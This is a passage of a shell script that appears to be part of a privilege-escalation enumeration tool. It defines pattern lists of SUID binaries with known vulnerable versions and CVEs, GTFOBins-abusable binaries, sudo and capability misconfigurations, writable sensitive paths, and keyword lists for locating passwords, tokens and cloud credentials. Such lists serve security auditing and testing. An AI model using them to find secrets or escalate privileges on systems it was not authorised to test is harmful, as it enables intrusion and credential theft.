prun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$"
sidG4="/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/VBoxHeadless$|/VBoxNetAdpCtl$|/VBoxNetDHCP$|/VBoxNetNAT$|/VBoxSDL$|/VBoxVolInfo$|/VirtualBoxVM$|/vmstat$|/vmware-authd$|/vmware-user-suid-wrapper$|/vmware-vmx$|/vmware-vmx-debug$|/vmware-vmx-stats$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$"
# Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE
IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION
sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\
/at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\
/abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22
/chfn$%SuSE_9.3/10\ /chkey$%Solaris_2.5.1\ /chkperm$%Solaris_7.0_\
/chpass$%2Vulns:OpenBSD_6.1_to_OpenBSD
6.6\(CVE-2019-19726\)--OpenBSD_2.7_i386/OpenBSD_2.6_i386/OpenBSD_2.5_1999/08/06/OpenBSD_2.5_1998/05/28/FreeBSD_4.0-RELEASE/FreeBSD_3.5-RELEASE/FreeBSD_3.4-RELEASE/NetBSD_1.4.2\
/chpasswd$%SquirrelMail\(2004-04\)\
/dtappgather$%Solaris_7_<_11_\(SPARC/x86\)\(CVE-2017-3622\)\
/dtprintinfo$%Solaris_10_\(x86\)_and_lower_versions_also_SunOS_5.7_to_5.10\
/dtsession$%Oracle_Solaris_10_1/13_and_earlier\(CVE-2020-2696\)\
/eject$%FreeBSD_mcweject_0.9/SGI_IRIX_6.2\
/ibstat$%IBM_AIX_Version_6.1/7.1\(09-2013\)\
/kcheckpass$%KDE_3.2.0_<-->_3.4.2_\(both_included\)\
/kdesud$%KDE_1.1/1.1.1/1.1.2/1.2\
/keybase-redirector%CentOS_Linux_release_7.4.1708\
/login$%IBM_AIX_3.2.5/SGI_IRIX_6.4\ /lpc$%S.u.S.E_Linux_5.2\
/lpr$%BSD/OS2.1/FreeBSD2.1.5/NeXTstep4.x/IRIX6.4/SunOS4.1.3/4.1.4\(09-1996\)\
/mail.local$%NetBSD_7.0-7.0.1__6.1-6.1.5__6.0-6.0.6
/mount$%Apple_Mac_OSX\(Lion\)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8\
/movemail$%Emacs\(08-1986\)\
/mrinfo$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\
/mtrace$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\
/netprint$%IRIX_5.3/6.2/6.3/6.4/6.5/6.5.11\ /newgrp$%HP-UX_10.20\
/ntfs-3g$%Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others\(02-2017\)\
/passwd$%Apple_Mac_OSX\(03-2006\)/Solaris_8/9\(12-2004\)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1\(02-1997\)\
/pkexec$%Linux4.10_to_5.1.17\(CVE-2019-13272\)/rhel_6\(CVE-2011-1485\)\
/pppd$%Apple_Mac_OSX_10.4.8\(05-2007\)\
/pt_chown$%GNU_glibc_2.1/2.1.1_-6\(08-1999\)\
/pulseaudio$%\(Ubuntu_9.04/Slackware_12.2.0\)\ /rcp$%RedHat_6.2\
/rdist$%Solaris_10/OpenSolaris\ /rsh$%Apple_Mac_OSX_10.9.5/10.10.5\(09-2015\)\
/screen$%GNU_Screen_4.5.0\ /sdtcm_convert$%Sun_Solaris_7.0\
/sendmail$%Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_\(SGI_ProPack_1.2/1.3\)\
/snap-confine$%Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation\(CVE-2019-7304\)\
/sudo%check_if_the_sudo_version_is_vulnerable\
/Serv-U%FTP_Server<15.1.7(CVE-2019-12181)
/sudoedit$%Sudo/SudoEdit_1.6.9p21/1.7.2p4/\(RHEL_5/6/7/Ubuntu\)/Sudo<=1.8.14\
/tmux$%Tmux_1.3_1.4_privesc\(CVE-2011-1496\)\
/traceroute$%LBL_Traceroute_\[2000-11-15\]\
/ubuntu-core-launcher$%Befre_1.0.27.1\(CVE-2016-1580\)\
/umount$%BSD/Linux\(08-1996\)\ /umount-loop$%Rocks_Clusters<=4.1\(07-2006\)\
/uucp$%Taylor_UUCP_1.0.6\ /XFree86$%XFree86_X11R6_3.3.x/4.0/4.x/3.3\(03-2003\)\
/xlock$%BSD/OS_2.1/DG/UX_7.0/Debian_1.3/HP-UX_10.34/IBM_AIX_4.2/SGI_IRIX_6.4/Solaris_2.5.1\(04-1997\)\
/xscreensaver%Solaris_11.x\(CVE-2019-3010\)\
/xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\
/xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)"
# To update sidVB: curl
https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null
| grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut
-d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|'
sidVB='/aa-exec$|/ab$|/agetty$|/alpine$|/ar$|/aria2c$|/arj$|/arp$|/as$|/ascii-xfr$|/ash$|/aspell$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/basez$|/bash$|/batcat$|/bc$|/bridge$|/busctl$|/busybox$|/byebug$|/bzip2$|/cabal$|/capsh$|/cat$|/chmod$|/choom$|/chown$|/chroot$|/clamscan$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dc$|/dd$|/debugfs$|/dialog$|/diff$|/dig$|/distcc$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/efax$|/elvish$|/emacs$|/env$|/eqn$|/espeak$|/expand$|/expect$|/file$|/find$|/fish$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/genie$|/genisoimage$|/gimp$|/ginsh$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/ispell$|/jjs$|/joe$|/join$|/jq$|/jrunscript$|/julia$|/ksh$|/ksshell$|/kubectl$|/latex$|/ldconfig$|/less$|/lftp$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/minicom$|/more$|/mosquitto$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$|/msguniq$|/multitime$|/mv$|/mysql$'
sidVB2='/nano$|/nasm$|/nawk$|/nc$|/ncdu$|/ncftp$|/nft$|/nice$|/nl$|/nm$|/nmap$|/node$|/nohup$|/ntpdate$|/octave$|/od$|/openssl$|/openvpn$|/pandoc$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pexec$|/pg$|/php$|/pic$|/pico$|/pidstat$|/posh$|/pr$|/pry$|/psftp$|/ptx$|/python$|/rake$|/rc$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmdb$|/rpmquery$|/rpmverify$|/rsync$|/rtorrent$|/run-parts$|/runscript$|/rview$|/rvim$|/sash$|/scanmem$|/scp$|/scrot$|/sed$|/setarch$|/setfacl$|/setlock$|/shuf$|/slsh$|/socat$|/soelim$|/softlimit$|/sort$|/sqlite3$|/ss$|/ssh-agent$|/ssh-keygen$|/ssh-keyscan$|/sshpass$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tasksh$|/tbl$|/tclsh$|/tdbtool$|/tee$|/telnet$|/terraform$|/tex$|/tftp$|/tic$|/time$|/timeout$|/tmate$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/unsquashfs$|/unzip$|/update-alternatives$|/uudecode$|/uuencode$|/vagrant$|/varnishncsa$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/w3m$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xdotool$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/yash$|/zip$|/zsh$|/zsoelim$'
cfuncs='file|free|main|more|read|split|write' sudoVB1="
\*|env_keep\W*\+=.*LD_PRELOAD|env_keep\W*\+=.*LD_LIBRARY_PATH|7z$|aa-exec$|ab$|alpine$|ansible-playbook$|ansible-test$|aoss$|apache2ctl$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ascii-xfr$|ascii85$|ash$|aspell$|at$|atobm$|awk$|aws$|base32$|base58$|base64$|basenc$|basez$|bash$|batcat$|bc$|bconsole$|bpftrace$|bridge$|bundle$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|cabal$|capsh$|cat$|cdist$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|choom$|chown$|chroot$|clamscan$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dc$|dd$|debugfs$|dialog$|diff$|dig$|distcc$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dotnet$|dpkg$|dstat$|dvips$|easy_install$|eb$|ed$|efax$|elvish$|emacs$|enscript$|env$|eqn$|espeak$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|fish$|flock$|fmt$|fold$|fping$|ftp$|gawk$|gcc$|gcloud$|gcore$|gdb$|gem$|genie$|genisoimage$|ghc$|ghci$|gimp$|ginsh$|git$|grc$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|ispell$|jjs$|joe$|join$|journalctl$|jq$|jrunscript$|jtag$|julia$|knife$|ksh$|ksshell$|ksu$|kubectl$|latex$|latexmk$|ldconfig$|less$|lftp$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|minicom$|more$|mosquitto$|mount$|msfconsole$|msgattrib$"
sudoVB2="msgcat$|msgconv$|msgfilter$|msgmerge$|msguniq$|mtr$|multitime$|mv$|mysql$|nano$|nasm$|nawk$|nc$|ncdu$|ncftp$|neofetch$|nft$|nice$|nl$|nm$|nmap$|node$|nohup$|npm$|nroff$|nsenter$|ntpdate$|octave$|od$|openssl$|openvpn$|openvt$|opkg$|pandoc$|paste$|pdb$|pdflatex$|pdftex$|perf$|perl$|perlbug$|pexec$|pg$|php$|pic$|pico$|pidstat$|pip$|pkexec$|pkg$|posh$|pr$|pry$|psftp$|psql$|ptx$|puppet$|pwsh$|python$|rake$|rc$|readelf$|red$|redcarpet$|restic$|rev$|rlwrap$|rpm$|rpmdb$|rpmquery$|rpmverify$|rsync$|ruby$|run-mailcap$|run-parts$|runscript$|rview$|rvim$|sash$|scanmem$|scp$|screen$|script$|scrot$|sed$|service$|setarch$|setfacl$|setlock$|sftp$|sg$|shuf$|slsh$|smbclient$|snap$|socat$|soelim$|softlimit$|sort$|split$|sqlite3$|sqlmap$|ss$|ssh-agent$|ssh-keygen$|ssh-keyscan$|ssh$|sshpass$|start-stop-daemon$|stdbuf$|strace$|strings$|su$|sudo$|sysctl$|systemctl$|systemd-resolve$|tac$|tail$|tar$|task$|taskset$|tasksh$|tbl$|tclsh$|tcpdump$|tdbtool$|tee$|telnet$|terraform$|tex$|tftp$|tic$|time$|timedatectl$|timeout$|tmate$|tmux$|top$|torify$|torsocks$|troff$|ul$|unexpand$|uniq$|unshare$|unsquashfs$|unzip$|update-alternatives$|uudecode$|uuencode$|vagrant$|valgrind$|varnishncsa$|vi$|view$|vigr$|vim$|vimdiff$|vipw$|virsh$|w3m$|wall$|watch$|wc$|wget$|whiptail$|wireshark$|wish$|xargs$|xdg-user-dir$|xdotool$|xelatex$|xetex$|xmodmap$|xmore$|xpad$|xxd$|xz$|yarn$|yash$|yum$|zathura$|zip$|zsh$|zsoelim$|zypper$"
sudoB="$(whoami)|ALL:ALL|ALL :
ALL|ALL|env_keep|NOPASSWD|SETENV|/apache2|/cryptsetup|/mount" sudoG="NOEXEC"
capsVB="cap_sys_admin:mount|python \ cap_sys_ptrace:python \
cap_sys_module:kmod|python \ cap_dac_override:python|vim \
cap_chown:chown|python \ cap_former:chown|python \
cap_setuid:gdb|node|perl|php|python|ruby|rview|rvim|view|vim|vimdiff \
cap_setgid:gdb|node|perl|php|python|ruby|rview|rvim|view|vim|vimdiff \
cap_net_raw:python|tcpdump"
capsB="=ep|cap_chown|cap_former|cap_setfcap|cap_dac_override|cap_dac_read_search|cap_setuid|cap_setgid|cap_kill|cap_net_bind_service|cap_net_raw|cap_net_admin|cap_sys_admin|cap_sys_ptrace|cap_sys_module"
containercapsB="sys_admin|sys_ptrace|sys_module|dac_read_search|dac_override|sys_rawio|syslog|net_raw|net_admin"
OLDPATH=$PATH ADDPATH=":/usr/local/sbin\ :/usr/local/bin\ :/usr/sbin\ :/usr/bin\
:/sbin\ :/bin" spath=":$PATH" for P in $ADDPATH; do if [ "${spath##*$P*}" ];
then export PATH="$PATH$P" 2>/dev/null; fi done # Test if sed supports -E or -r
E=E echo | sed -${E} 's/o/a/' 2>/dev/null if [ $? -ne 0 ] ; then echo | sed -r
's/o/a/' 2>/dev/null if [ $? -eq 0 ] ; then E=r else echo "${YELLOW}WARNING: No
suitable option found for extended regex with sed. Continuing but the results
might be unreliable.${NC}" fi fi
writeB="00-header|10-help-text|50-motd-news|80-esm|91-release-upgrade|\.sh$|\./|/authorized_keys|/bin/|/boot/|/etc/apache2/apache2.conf|/etc/apache2/httpd.conf|/etc/hosts.allow|/etc/hosts.deny|/etc/httpd/conf/httpd.conf|/etc/httpd/httpd.conf|/etc/inetd.conf|/etc/incron.conf|/etc/login.defs|/etc/logrotate.d/|/etc/modprobe.d/|/etc/pam.d/|/etc/php.*/fpm/pool.d/|/etc/php/.*/fpm/pool.d/|/etc/rsyslog.d/|/etc/skel/|/etc/sysconfig/network-scripts/|/etc/sysctl.conf|/etc/sysctl.d/|/etc/uwsgi/apps-enabled/|/etc/xinetd.conf|/etc/xinetd.d/|/etc/|/home//|/lib/|/log/|/mnt/|/root|/sys/|/usr/bin|/usr/games|/usr/lib|/usr/local/bin|/usr/local/games|/usr/local/sbin|/usr/sbin|/sbin/|/var/log/|\.timer$|\.service$|.socket$"
writeVB="/etc/anacrontab|/etc/apt/apt.conf.d|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/skey/|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/cron/tabs/|/usr/lib/systemd|/systemd/system|/var/db/yubikey/|/var/spool/anacron|/var/spool/cron/crontabs|"$(echo
$PATH 2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed
's/:/$|^/g') #Add Path but remove simple dot in PATH if [ "$MACPEAS" ]; then
sh_usrs="ImPoSSssSiBlEee" nosh_usrs="ImPoSSssSiBlEee" dscl . list /Users | while
read uname; do ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
if grep -q \"$ushell\" /etc/shells; then sh_usrs="$sh_usrs|$uname"; else
nosh_usrs="$nosh_usrs|$uname"; fi done else sh_usrs=$(cat /etc/passwd
2>/dev/null | grep -v "^root:" | grep -i "sh$" | cut -d ":" -f 1 | tr '\n' '|' |
sed 's/|bin|/|bin[\\\s:]|^bin$|/' | sed 's/|sys|/|sys[\\\s:]|^sys$|/' | sed
's/|daemon|/|daemon[\\\s:]|^daemon$|/')"ImPoSSssSiBlEee" #Modified bin, sys and
daemon so they are not colored everywhere # Surround each username with word
boundary character '\b' to prevent false positives caused by short user names
(e.g. user "sys" shouldn't highlight partial match on "system") nosh_usrs=$(cat
/etc/passwd 2>/dev/null | grep -i -v "sh$" |awk '{ print "\\b" $0 }' | sort |
cut -d ":" -f 1 | sed s/$/\\\\b/g | tr '\n' '|' | sed
's/|bin|/|bin[\\\s:]|^bin$|/')"ImPoSSssSiBlEee" fi
knw_usrs='_amavisd|_analyticsd|_appinstalld|_appleevents|_applepay|_appowner|_appserver|_appstore|_ard|_assetcache|_astris|_atsserver|_avbdeviced|_calendar|_captiveagent|_ces|_clamav|_cmiodalassistants|_coreaudiod|_coremediaiod|_coreml|_ctkd|_cvmsroot|_cvs|_cyrus|_datadetectors|_demod|_devdocs|_devicemgr|_diskimagesiod|_displaypolicyd|_distnote|_dovecot|_dovenull|_dpaudio|_driverkit|_eppc|_findmydevice|_fpsd|_ftp|_fud|_gamecontrollerd|_geod|_hidd|_iconservices|_installassistant|_installcoordinationd|_installer|_jabber|_kadmin_admin|_kadmin_changepw|_knowledgegraphd|_krb_anonymous|_krb_changepw|_krb_kadmin|_krb_kerberos|_krb_krbtgt|_krbfast|_krbtgt|_launchservicesd|_lda|_locationd|_logd|_lp|_mailman|_mbsetupuser|_mcxalr|_mdnsresponder|_mobileasset|_mysql|_nearbyd|_netbios|_netstatistics|_networkd|_nsurlsessiond|_nsurlstoraged|_oahd|_ondemand|_postfix|_postgres|_qtss|_reportmemoryexception|_rmd|_sandbox|_screensaver|_scsd|_securityagent|_softwareupdate|_spotlight|_sshd|_svn|_taskgated|_teamsserver|_timed|_timezone|_tokend|_trustd|_trustevaluationagent|_unknown|_update_sharing|_usbmuxd|_uucp|_warmd|_webauthserver|_windowserver|_www|_wwwproxy|_xserverdocs|daemon\W|^daemon$|message\+|syslog|www|www-data|mail|nobody|Debian\-\+|rtkit|systemd\+'
if ! [ "$USER" ]; then USER=$(whoami 2>/dev/null || echo -n "UserUnknown") fi if
[ ! "$HOME" ]; then if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; # Mac
home else HOME="/home/$USER"; fi fi Groups="ImPoSSssSiBlEee"$(groups "$USER"
2>/dev/null | cut -d ":" -f 2 | tr ' ' '|') # These variables are divided into
several different ones because NetBSD requires that. pwd_inside_history="az
login|enable_autologin|7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|roadrecon
auth|root|snyk|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|Save-AzContext|xfreerdp|^ssh|steghide|@|KEY=|TOKEN=|BEARER=|Authorization:|chpasswd"
pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID"
pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID"
pwd_in_variables3="CHROME_CLIENT_SECRET|CHROME_EXTENSION_ID|CHROME_REFRESH_TOKEN|CI_DEPLOY_USER|CI_NAME|CI_PROJECT_NAMESPACE|CI_PROJECT_URL|CI_REGISTRY_USER|CI_SERVER_NAME|CI_USER_TOKEN|CLAIMR_DATABASE|CLAIMR_DB|CLAIMR_SUPERUSER|CLAIMR_TOKEN|CLIENT_ID|CLIENT_SECRET|CLI_E2E_CMA_TOKEN|CLI_E2E_ORG_ID|CLOUDAMQP_URL|CLOUDANT_APPLIANCE_DATABASE|CLOUDANT_ARCHIVED_DATABASE|CLOUDANT_AUDITED_DATABASE|CLOUDANT_DATABASE|CLOUDANT_ORDER_DATABASE|CLOUDANT_PARSED_DATABASE|CLOUDANT_PROCESSED_DATABASE|CLOUDANT_SERVICE_DATABASE|CLOUDFLARE_API_KEY|CLOUDFLARE_AUTH_EMAIL|CLOUDFLARE_AUTH_KEY|CLOUDFLARE_EMAIL|CLOUDFLARE_ZONE_ID|CLOUDINARY_URL|CLOUDINARY_URL_EU|CLOUDINARY_URL_STAGING|CLOUD_API_KEY|CLUSTER_NAME|CLU_REPO_URL|CLU_SSH_PRIVATE_KEY_BASE64|CN_ACCESS_KEY_ID|CN_SECRET_ACCESS_KEY|COCOAPODS_TRUNK_EMAIL|COCOAPODS_TRUNK_TOKEN|CODACY_PROJECT_TOKEN|CODECLIMATE_REPO_TOKEN|CODECOV_TOKEN|coding_token|CONEKTA_APIKEY|CONFIGURATION_PROFILE_SID|CONFIGURATION_PROFILE_SID_P2P|CONFIGURATION_PROFILE_SID_SFU|CONSUMERKEY|CONSUMER_KEY|CONTENTFUL_ACCESS_TOKEN|CONTENTFUL_CMA_TEST_TOKEN|CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN|CONTENTFUL_INTEGRATION_SOURCE_SPACE|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW|CONTENTFUL_ORGANIZATION"
pwd_in_variables4="CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN|CONTENTFUL_TEST_ORG_CMA_TOKEN|CONTENTFUL_V2_ACCESS_TOKEN|CONTENTFUL_V2_ORGANIZATION|CONVERSATION_URL|COREAPI_HOST|COS_SECRETS|COVERALLS_API_TOKEN|COVERALLS_REPO_TOKEN|COVERALLS_SERVICE_NAME|COVERALLS_TOKEN|COVERITY_SCAN_NOTIFICATION_EMAIL|COVERITY_SCAN_TOKEN|CYPRESS_RECORD_KEY|DANGER_GITHUB_API_TOKEN|DATABASE_HOST|DATABASE_NAME|DATABASE_PORT|DATABASE_USER|DATABASE_PASSWORD|datadog_api_key|datadog_app_key|DB_CONNECTION|DB_DATABASE|DB_HOST|DB_PORT|DB_PW|DB_USER|DDGC_GITHUB_TOKEN|DDG_TEST_EMAIL|DDG_TEST_EMAIL_PW|DEPLOY_DIR|DEPLOY_DIRECTORY|DEPLOY_HOST|DEPLOY_PORT|DEPLOY_SECURE|DEPLOY_TOKEN|DEPLOY_USER|DEST_TOPIC|DHL_SOLDTOACCOUNTID|DH_END_POINT_1|DH_END_POINT_2|DIGITALOCEAN_ACCESS_TOKEN|DIGITALOCEAN_SSH_KEY_BODY|DIGITALOCEAN_SSH_KEY_IDS|DOCKER_EMAIL|DOCKER_KEY|DOCKER_PASSDOCKER_POSTGRES_URL|DOCKER_RABBITMQ_HOST|docker_repo|DOCKER_TOKEN|DOCKER_USER|DOORDASH_AUTH_TOKEN|DROPBOX_OAUTH_BEARER|ELASTICSEARCH_HOST|ELASTIC_CLOUD_AUTH|env.GITHUB_OAUTH_TOKEN|env.HEROKU_API_KEY|ENV_KEY|ENV_SECRET|ENV_SECRET_ACCESS_KEY|eureka.awsAccessId"
pwd_in_variables5="eureka.awsSecretKey|ExcludeRestorePackageImports|EXPORT_SPACE_ID|FIREBASE_API_JSON|FIREBASE_API_TOKEN|FIREBASE_KEY|FIREBASE_PROJECT|FIREBASE_PROJECT_DEVELOP|FIREBASE_PROJECT_ID|FIREBASE_SERVICE_ACCOUNT|FIREBASE_TOKEN|FIREFOX_CLIENT|FIREFOX_ISSUER|FIREFOX_SECRET|FLASK_SECRET_KEY|FLICKR_API_KEY|FLICKR_API_SECRET|FOSSA_API_KEY|ftp_host|FTP_LOGIN|FTP_PW|FTP_USER|GCLOUD_BUCKET|GCLOUD_PROJECT|GCLOUD_SERVICE_KEY|GCS_BUCKET|GHB_TOKEN|GHOST_API_KEY|GH_API_KEY|GH_EMAIL|GH_NAME|GH_NEXT_OAUTH_CLIENT_ID|GH_NEXT_OAUTH_CLIENT_SECRET|GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID|GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET|GH_OAUTH_CLIENT_ID|GH_OAUTH_CLIENT_SECRET|GH_OAUTH_TOKEN|GH_REPO_TOKEN|GH_TOKEN|GH_UNSTABLE_OAUTH_CLIENT_ID|GH_UNSTABLE_OAUTH_CLIENT_SECRET|GH_USER_EMAIL|GH_USER_NAME|GITHUB_ACCESS_TOKEN|GITHUB_API_KEY|GITHUB_API_TOKEN|GITHUB_AUTH|GITHUB_AUTH_TOKEN|GITHUB_AUTH_USER|GITHUB_CLIENT_ID|GITHUB_CLIENT_SECRET|GITHUB_DEPLOYMENT_TOKEN|GITHUB_DEPLOY_HB_DOC_PASS|GITHUB_HUNTER_TOKEN|GITHUB_KEY|GITHUB_OAUTH|GITHUB_OAUTH_TOKEN|GITHUB_RELEASE_TOKEN|GITHUB_REPO|GITHUB_TOKEN|GITHUB_TOKENS|GITHUB_USER|GITLAB_USER_EMAIL|GITLAB_USER_LOGIN|GIT_AUTHOR_EMAIL|GIT_AUTHOR_NAME|GIT_COMMITTER_EMAIL|GIT_COMMITTER_NAME|GIT_EMAIL|GIT_NAME|GIT_TOKEN|GIT_USER"
